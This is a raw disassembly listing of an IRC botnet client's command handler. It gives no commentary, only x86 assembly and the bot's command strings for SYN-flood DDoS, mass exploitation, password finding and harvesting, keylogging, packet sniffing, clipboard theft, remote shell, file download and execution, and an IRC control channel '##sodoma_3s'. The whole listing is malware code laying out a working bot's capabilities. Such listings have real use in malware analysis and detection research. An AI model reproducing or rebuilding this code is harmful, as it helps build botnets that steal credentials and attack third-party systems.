loc_410B05: ; CODE XREF: sub_40F6F1+140D�j
push eax
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 1Ch
jmp loc_4100A4
; ---------------------------------------------------------------------------
loc_410B31: ; CODE XREF: sub_40F6F1+13FF�j
push [ebp+arg_8]
push offset aThreads_list ; "threads.list"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41537C
push [ebp+arg_8]
push offset aThreads_l ; "threads.l"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41537C
push [ebp+arg_8]
push offset aIrc_aliases ; "irc.aliases"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41535E
push [ebp+arg_8]
push offset aIrc_al ; "irc.al"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41535E
push [ebp+arg_8]
push offset aIrc_log ; "irc.log"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415271
push [ebp+arg_8]
push offset aIrc_lg ; "irc.lg"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415271
push [ebp+arg_8]
push offset aUtil_clearlog ; "util.clearlog"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41525A
push [ebp+arg_8]
push offset aUtil_clg ; "util.clg"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41525A
push [ebp+arg_8]
push offset aCom_netinfo ; "com.netinfo"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415227
push [ebp+arg_8]
push offset aCom_ni ; "com.ni"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415227
push [ebp+arg_8]
push offset aDdos_supersyn ; "ddos.supersyn"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_410D3A
mov eax, [ebp+esi+var_90]
push 7Fh
mov [ebp+arg_24], eax
push eax
lea eax, [ebp+var_76C]
push eax
call sub_4182F0
mov eax, [ebp+esi+var_8C]
push 7Fh
mov [ebp+arg_18], eax
push eax
lea eax, [ebp+var_6EC]
push eax
call sub_4182F0
mov esi, [ebp+esi+var_88]
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_4182F0
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_4182F0
mov eax, [ebp+var_4]
push esi
push [ebp+arg_18]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_770], edi
push [ebp+arg_24]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push offset unk_437A60
push eax
call sub_4173AC
add esp, 44h
lea eax, [ebp+var_2DC]
push ebx
push 14h
push eax
call sub_416E58
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_40182E
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_410D1A
loc_410D04: ; CODE XREF: sub_40F6F1+1627�j
cmp [ebp+var_560], ebx
jnz loc_414FBB
push 32h
nop
call near ptr 7C802442h
jmp short loc_410D04
; ---------------------------------------------------------------------------
loc_410D1A: ; CODE XREF: sub_40F6F1+1611�j
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_2DC]
push offset unk_437A14
push eax
call sub_4173AC
add esp, 0Ch
jmp loc_414FBB
; ---------------------------------------------------------------------------
loc_410D3A: ; CODE XREF: sub_40F6F1+1537�j
push [ebp+arg_8]
push offset aCom_sysinfo ; "com.sysinfo"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415200
push [ebp+arg_8]
push offset aCom_si ; "com.si"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415200
push [ebp+arg_8]
push offset aIrc_discordanc ; "irc.discordanc33"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4151CA
push [ebp+arg_8]
push offset aIrc_disco33 ; "irc.disco33"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4151CA
push [ebp+arg_8]
push offset aCom_procs ; "com.procs"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4150C3
push [ebp+arg_8]
push offset aCom_ps ; "com.ps"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4150C3
push [ebp+arg_8]
push offset aCom_harvest ; "com.harvest"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41509B
push [ebp+arg_8]
push offset aCom_key ; "com.key"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41509B
push [ebp+arg_8]
push offset aCom_uptime ; "com.uptime"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415015
push [ebp+arg_8]
push offset aCom_up ; "com.up"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415015
push [ebp+arg_8]
push offset aCom_driveinfo ; "com.driveinfo"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414FFA
push [ebp+arg_8]
push offset aCom_drv ; "com.drv"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414FFA
push [ebp+arg_8]
push offset aCom_testdlls ; "com.testdlls"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414FE3
push [ebp+arg_8]
push offset aCom_dll ; "com.dll"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414FE3
push [ebp+arg_8]
push offset aCom_opencmd ; "com.opencmd"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414F7B
push [ebp+arg_8]
push offset aCom_ocmd ; "com.ocmd"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414F7B
push [ebp+arg_8]
push offset aCom_ocmd_off ; "com.ocmd.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410ED5
push [ebp+esi+var_90]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_410782
; ---------------------------------------------------------------------------
loc_410ED5: ; CODE XREF: sub_40F6F1+17CA�j
push [ebp+arg_8]
push offset aIrc_who ; "irc.who"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_410F6D
cmp [ebp+var_8], ebx
jnz short loc_410F09
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 14h
loc_410F09: ; CODE XREF: sub_40F6F1+17FE�j
mov eax, [ebp+arg_18]
xor esi, esi
mov [ebp+arg_4], eax
jmp short loc_410F16
; ---------------------------------------------------------------------------
loc_410F13: ; CODE XREF: sub_40F6F1+186A�j
mov eax, [ebp+arg_4]
loc_410F16: ; CODE XREF: sub_40F6F1+1820�j
cmp [eax], bl
jz short loc_410F1D
inc eax
jmp short loc_410F22
; ---------------------------------------------------------------------------
loc_410F1D: ; CODE XREF: sub_40F6F1+1827�j
mov eax, offset aEmpty ; "<Empty>"
loc_410F22: ; CODE XREF: sub_40F6F1+182A�j
push eax
push esi
lea eax, [ebp+var_2DC]
push offset aD_S ; "%d. %s"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
add [ebp+arg_4], 80h
add esp, 24h
inc esi
cmp esi, 2
jl short loc_410F13
push offset dword_4378DC
loc_410F62: ; CODE XREF: sub_40F6F1+5D74�j
call sub_40C4F7
pop ecx
jmp loc_415956
; ---------------------------------------------------------------------------
loc_410F6D: ; CODE XREF: sub_40F6F1+17F5�j
push [ebp+arg_8]
push offset aCom_getclip ; "com.getclip"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414F3E
push [ebp+arg_8]
push offset aCom_gc ; "com.gc"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414F3E
push [ebp+arg_8]
push offset aUtil_flusharp ; "util.flusharp"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414F13
push [ebp+arg_8]
push offset aUtil_farp ; "util.farp"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414F13
push [ebp+arg_8]
push offset aUtil_flushdns ; "util.flushdns"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414EEF
push [ebp+arg_8]
push offset aUtil_fdns ; "util.fdns"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414EEF
push [ebp+arg_8]
push offset aRoot_currentip ; "root.currentip"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414EB4
push [ebp+arg_8]
push offset aRoot_cip ; "root.cip"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414EB4
push [ebp+arg_8]
push offset aDaemon_httpd_o ; "daemon.httpd.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414D21
push [ebp+arg_8]
push offset aDaemon_web_on ; "daemon.web.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414D21
push [ebp+arg_8]
push offset aDaemon_tftp_on ; "daemon.tftp.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414BD6
push [ebp+arg_8]
push offset aDaemon_tf_on ; "daemon.tf.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414BD6
push [ebp+arg_8]
push offset aCom_findpass ; "com.findpass"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414B32
push [ebp+arg_8]
push offset aCom_fp ; "com.fp"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414B32
push [ebp+arg_8]
push offset aRoot_massexplo ; "root.massexploit"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41483E
push [ebp+arg_8]
push offset aRoot_mass ; "root.mass"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41483E
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz loc_40FAB8
push [ebp+arg_8]
push offset aIrc_nick ; "irc.nick"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414825
push [ebp+arg_8]
push offset aIrc_n ; "irc.n"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414825
push [ebp+arg_8]
push offset aIrc_join ; "irc.join"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414805
push [ebp+arg_8]
push offset aIrc_j ; "irc.j"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414805
push [ebp+arg_8]
push offset aIrc_part ; "irc.part"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4147EC
push [ebp+arg_8]
push offset aIrc_pt ; "irc.pt"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4147EC
push [ebp+arg_8]
push offset aIrc_raw ; "irc.raw"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4147B5
push [ebp+arg_8]
push offset aIrc_ra ; "irc.ra"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4147B5
push [ebp+arg_8]
push offset aThreads_kill ; "threads.kill"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4146F2
push [ebp+arg_8]
push offset aThreads_k ; "threads.k"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4146F2
push [ebp+arg_8]
push offset aClone_quit ; "clone.quit"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414647
push [ebp+arg_8]
push offset aClone_q ; "clone.q"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414647
push [ebp+arg_8]
push offset aClone_rndnick ; "clone.rndnick"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4145F9
push [ebp+arg_8]
push offset aClone_rn ; "clone.rn"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4145F9
push [ebp+arg_8]
push offset aIrc_prefix ; "irc.prefix"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4145D5
push [ebp+arg_8]
push offset aIrc_pr ; "irc.pr"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4145D5
push [ebp+arg_8]
push offset aCom_open ; "com.open"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4145AB
push [ebp+arg_8]
push offset aCom_o ; "com.o"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4145AB
push [ebp+arg_8]
push offset aIrc_setserve ; "irc.setserve"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414586
push [ebp+arg_8]
push offset aIrc_se ; "irc.se"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414586
push [ebp+arg_8]
push offset aIrc_dns ; "irc.dns"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4144F4
push [ebp+arg_8]
push offset aIrc_dn ; "irc.dn"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4144F4
push [ebp+arg_8]
push offset aCom_killprocna ; "com.killprocname"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4144C8
push [ebp+arg_8]
push offset aCom_kpn ; "com.kpn"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4144C8
push [ebp+arg_8]
push offset aCom_prockillid ; "com.prockillid"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41446D
push [ebp+arg_8]
push offset aCom_pkid ; "com.pkid"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41446D
push [ebp+arg_8]
push offset aCom_delete ; "com.delete"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414436
push [ebp+arg_8]
push offset aCom_del ; "com.del"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414436
push [ebp+arg_8]
push offset aDcc_get ; "dcc.get"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414355
push [ebp+arg_8]
push offset aDcc_gt ; "dcc.gt"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414355
push [ebp+arg_8]
push offset aCom_filelist ; "com.filelist"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41433A
push [ebp+arg_8]
push offset aCom_fl ; "com.fl"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41433A
push [ebp+arg_8]
push offset aIrc_visit ; "irc.visit"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41425C
push [ebp+arg_8]
push offset aIrc_v ; "irc.v"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41425C
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414221
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414221
push [ebp+arg_8]
push offset aCom_cmd ; "com.cmd"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4141D6
push [ebp+arg_8]
push offset aCom_cm ; "com.cm"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4141D6
push [ebp+arg_8]
push offset aCom_readfile ; "com.readfile"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414142
push [ebp+arg_8]
push offset aCom_rf ; "com.rf"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_414142
push [ebp+arg_8]
push offset aPsniff ; "psniff"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4115F4
push edi
push offset aOn ; "on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_411595
push 19h
call sub_4170A0
test eax, eax
pop ecx
jle short loc_4114C6
push offset a_n_z_m_Psniff_ ; ".n.z.m. (psniff.p.l.g) .»». Already ru"...
jmp loc_4115C4
; ---------------------------------------------------------------------------
loc_4114C6: ; CODE XREF: sub_40F6F1+1DC9�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_464], eax
jnz short loc_411508
mov esi, offset aSodoma_3s_0 ; "##sodoma_3s"
push offset byte_43C63C
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_411508
mov esi, [ebp+var_8C]
loc_411508: ; CODE XREF: sub_40F6F1+1DF9�j
; sub_40F6F1+1E0F�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_41792A
lea eax, [ebp+var_2DC]
push offset a_n_z_m_Psnif_0 ; ".n.z.m. (psniff.p.l.g) .»». Carnivore "...
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 19h
push eax
call sub_416E58
add esp, 20h
mov [ebp+var_46C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_402822
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_46C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_411584
loc_411572: ; CODE XREF: sub_40F6F1+1E91�j
cmp [ebp+var_460], ebx
jnz short loc_4115D2
push 32h
nop
call near ptr 7C802442h
jmp short loc_411572
; ---------------------------------------------------------------------------
loc_411584: ; CODE XREF: sub_40F6F1+1E7F�j
nop
call near ptr 7C910331h
push eax
push offset a_n_z_m_Psnif_1 ; ".n.z.m. (psniff.p.l.g) .»». Failed to "...
jmp loc_4145E5
; ---------------------------------------------------------------------------
loc_411595: ; CODE XREF: sub_40F6F1+1DB9�j
push edi
push offset aOff ; "off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4115D2
push ebx
push 19h
call sub_417053
pop ecx
cmp eax, ebx
pop ecx
jle short loc_4115BF
push eax
push offset a_n_z_m_Psnif_2 ; ".n.z.m. (psniff.p.l.g) .»». Carnivore "...
jmp loc_4145E5
; ---------------------------------------------------------------------------
loc_4115BF: ; CODE XREF: sub_40F6F1+1EC1�j
push offset a_n_z_m_Psnif_3 ; ".n.z.m. (psniff.p.l.g) .»». No Carnivo"...
loc_4115C4: ; CODE XREF: sub_40F6F1+1DD0�j
; sub_40F6F1+1F40�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_4115D2: ; CODE XREF: sub_40F6F1+1E87�j
; sub_40F6F1+1EB3�j ...
cmp [ebp+var_8], ebx
jnz loc_4100A4
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
jmp loc_4158DB
; ---------------------------------------------------------------------------
loc_4115F4: ; CODE XREF: sub_40F6F1+1DA4�j
push [ebp+arg_8]
push offset aSniffer ; "sniffer"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_41173E
push edi
push offset aOn ; "on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_411706
push 22h
call sub_4170A0
test eax, eax
pop ecx
jle short loc_411633
push offset a_n_z_m_Sniffer ; ".n.z.m. (sniffer.p.l.g) .»». Already ru"...
jmp short loc_4115C4
; ---------------------------------------------------------------------------
loc_411633: ; CODE XREF: sub_40F6F1+1F39�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_464], eax
jnz short loc_411675
mov esi, offset aSodoma_3s_0 ; "##sodoma_3s"
push offset byte_43C63C
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_411675
mov esi, [ebp+var_8C]
loc_411675: ; CODE XREF: sub_40F6F1+1F66�j
; sub_40F6F1+1F7C�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_41792A
lea eax, [ebp+var_2DC]
push offset a_n_z_m_Sniff_0 ; ".n.z.m. (sniffer.p.l.g) .»». packet sni"...
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 22h
push eax
call sub_416E58
add esp, 20h
mov [ebp+var_46C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_402E92
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_46C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4116F5
loc_4116DF: ; CODE XREF: sub_40F6F1+2002�j
cmp [ebp+var_460], ebx
jnz loc_4115D2
push 32h
nop
call near ptr 7C802442h
jmp short loc_4116DF
; ---------------------------------------------------------------------------
loc_4116F5: ; CODE XREF: sub_40F6F1+1FEC�j
nop
call near ptr 7C910331h
push eax
push offset a_n_z_m_Sniff_1 ; ".n.z.m. (sniffer.p.l.g) .»». Failed to "...
jmp loc_4145E5
; ---------------------------------------------------------------------------
loc_411706: ; CODE XREF: sub_40F6F1+1F29�j
push edi
push offset aOff ; "off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4115D2
push ebx
push 22h
call sub_417053
pop ecx
cmp eax, ebx
pop ecx
jle short loc_411734
push eax
push offset a_n_z_m_Sniff_2 ; ".n.z.m. (sniffer.p.l.g) .»». sniffer s"...
jmp loc_4145E5
; ---------------------------------------------------------------------------
loc_411734: ; CODE XREF: sub_40F6F1+2036�j
push offset a_n_z_m_Sniff_3 ; ".n.z.m. (sniffer.p.l.g) .»». No sniffer"...
jmp loc_4115C4
; ---------------------------------------------------------------------------
loc_41173E: ; CODE XREF: sub_40F6F1+1F14�j
push [ebp+arg_8]
push offset aKeylog ; "keylog"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413FD6
push [ebp+arg_8]
push offset aCmd_kl_on ; "cmd.kl.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413FD6
push [ebp+arg_8]
push offset aOffz ; "offz"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413FB5
push [ebp+arg_8]
push offset aOffz ; "offz"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413FB5
push [ebp+arg_8]
push offset aSys_net ; "sys.net"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_411A6B
cmp dword_441488, ebx
jz short loc_4117CB
cmp dword_4414B0, ebx
jz short loc_4117CB
push offset dword_437368
jmp loc_411A25
; ---------------------------------------------------------------------------
loc_4117CB: ; CODE XREF: sub_40F6F1+20C6�j
; sub_40F6F1+20CE�j
cmp [ebp+var_C], ebx
jz loc_411A33
mov eax, [ebp+esi+var_8C]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_4117F3
push eax
push [ebp+var_C]
call sub_417980
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_4117F3: ; CODE XREF: sub_40F6F1+20F2�j
push edi
push offset aStart ; "start"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_411859
cmp [ebp+arg_18], ebx
jz short loc_41182D
push [ebp+arg_0]
push 3
loc_41180E: ; CODE XREF: sub_40F6F1+217E�j
; sub_40F6F1+2196�j ...
call sub_40DCAB
push eax
lea eax, [ebp+var_2DC]
push offset dword_42433C
push eax
call sub_4173AC
add esp, 14h
jmp loc_411A33
; ---------------------------------------------------------------------------
loc_41182D: ; CODE XREF: sub_40F6F1+2116�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DF52
add esp, 0Ch
test eax, eax
jz short loc_41184F
push offset dword_437334
jmp loc_411A25
; ---------------------------------------------------------------------------
loc_41184F: ; CODE XREF: sub_40F6F1+2152�j
push offset dword_437304
jmp loc_411A25
; ---------------------------------------------------------------------------
loc_411859: ; CODE XREF: sub_40F6F1+2111�j
push edi
push offset aStop ; "stop"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_411871
push [ebp+arg_0]
push 4
jmp short loc_41180E
; ---------------------------------------------------------------------------
loc_411871: ; CODE XREF: sub_40F6F1+2177�j
push edi
push offset aPause ; "pause"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_411889
push [ebp+arg_0]
push 5
jmp short loc_41180E
; ---------------------------------------------------------------------------
loc_411889: ; CODE XREF: sub_40F6F1+218F�j
push edi
push offset aContinue ; "continue"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4118A4
push [ebp+arg_0]
push 6
jmp loc_41180E
; ---------------------------------------------------------------------------
loc_4118A4: ; CODE XREF: sub_40F6F1+21A7�j
push edi
push offset aDelete ; "delete"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4118BF
push [ebp+arg_0]
push 1
jmp loc_41180E
; ---------------------------------------------------------------------------
loc_4118BF: ; CODE XREF: sub_40F6F1+21C2�j
push edi
push offset aShare ; "share"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41193C
cmp [ebp+arg_18], ebx
jz short loc_41190F
cmp [ebp+var_9C4], bl
jz short loc_4118E5
push ebx
push [ebp+arg_18]
push 1
jmp short loc_4118F0
; ---------------------------------------------------------------------------
loc_4118E5: ; CODE XREF: sub_40F6F1+21EA�j
push [ebp+esi+var_88]
push [ebp+arg_18]
push ebx
loc_4118F0: ; CODE XREF: sub_40F6F1+21F2�j
call sub_40E08F
push eax
lea eax, [ebp+var_2DC]
push offset dword_42433C
push eax
call sub_4173AC
add esp, 18h
jmp loc_411A33
; ---------------------------------------------------------------------------
loc_41190F: ; CODE XREF: sub_40F6F1+21E2�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40E284
add esp, 10h
test eax, eax
jz short loc_411932
push offset dword_4372B4
jmp loc_411A25
; ---------------------------------------------------------------------------
loc_411932: ; CODE XREF: sub_40F6F1+2235�j
push offset dword_437284
jmp loc_411A25
; ---------------------------------------------------------------------------
loc_41193C: ; CODE XREF: sub_40F6F1+21DD�j
push edi
push offset aUser ; "user"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4119D8
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_4119B1
cmp [ebp+var_9C4], bl
jz short loc_411972
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_411992
; ---------------------------------------------------------------------------
loc_411972: ; CODE XREF: sub_40F6F1+226D�j
push [ebp+var_4]
mov esi, [ebp+esi+var_88]
cmp esi, ebx
push [ebp+var_8C]
push [ebp+arg_4]
jz short loc_41198E
push esi
push eax
push ebx
jmp short loc_411992
; ---------------------------------------------------------------------------
loc_41198E: ; CODE XREF: sub_40F6F1+2296�j
push ebx
push eax
push 2
loc_411992: ; CODE XREF: sub_40F6F1+227F�j
; sub_40F6F1+229B�j
call sub_40E3A5
push eax
lea eax, [ebp+var_2DC]
push offset dword_42433C
push eax
call sub_4173AC
add esp, 24h
jmp loc_411A33
; ---------------------------------------------------------------------------
loc_4119B1: ; CODE XREF: sub_40F6F1+2265�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40E8B9
add esp, 10h
test eax, eax
jz short loc_4119D1
push offset dword_43724C
jmp short loc_411A25
; ---------------------------------------------------------------------------
loc_4119D1: ; CODE XREF: sub_40F6F1+22D7�j
push offset dword_437220
jmp short loc_411A25
; ---------------------------------------------------------------------------
loc_4119D8: ; CODE XREF: sub_40F6F1+225A�j
push edi
push offset aSend ; "send"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_411A20
cmp [ebp+arg_18], ebx
jz short loc_411A19
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EB6D
push eax
lea eax, [ebp+var_2DC]
push offset dword_42433C
push eax
call sub_4173AC
add esp, 1Ch
jmp short loc_411A33
; ---------------------------------------------------------------------------
loc_411A19: ; CODE XREF: sub_40F6F1+22FB�j
push offset dword_4371F0
jmp short loc_411A25
; ---------------------------------------------------------------------------
loc_411A20: ; CODE XREF: sub_40F6F1+22F6�j
push offset dword_4371C4
loc_411A25: ; CODE XREF: sub_40F6F1+20D5�j
; sub_40F6F1+2159�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_411A33: ; CODE XREF: sub_40F6F1+20DD�j
; sub_40F6F1+2137�j ...
cmp [ebp+var_8], ebx
jnz short loc_411A54
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
loc_411A4C: ; CODE XREF: sub_40F6F1+6124�j
call sub_40DC10
add esp, 14h
loc_411A54: ; CODE XREF: sub_40F6F1+2345�j
; sub_40F6F1+4AC6�j ...
mov esi, [ebp+arg_24]
loc_411A57: ; CODE XREF: sub_40F6F1+9B6�j
; sub_40F6F1+4DB0�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
pop ecx
mov eax, esi
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_411A6B: ; CODE XREF: sub_40F6F1+20BA�j
push [ebp+arg_8]
push offset aCom_capture ; "com.capture"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413D72
push [ebp+arg_8]
push offset aCom_cap ; "com.cap"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413D72
push [ebp+arg_8]
push offset aIrc_gethost ; "irc.gethost"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413C8E
push [ebp+arg_8]
push offset aIrc_gh ; "irc.gh"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413C8E
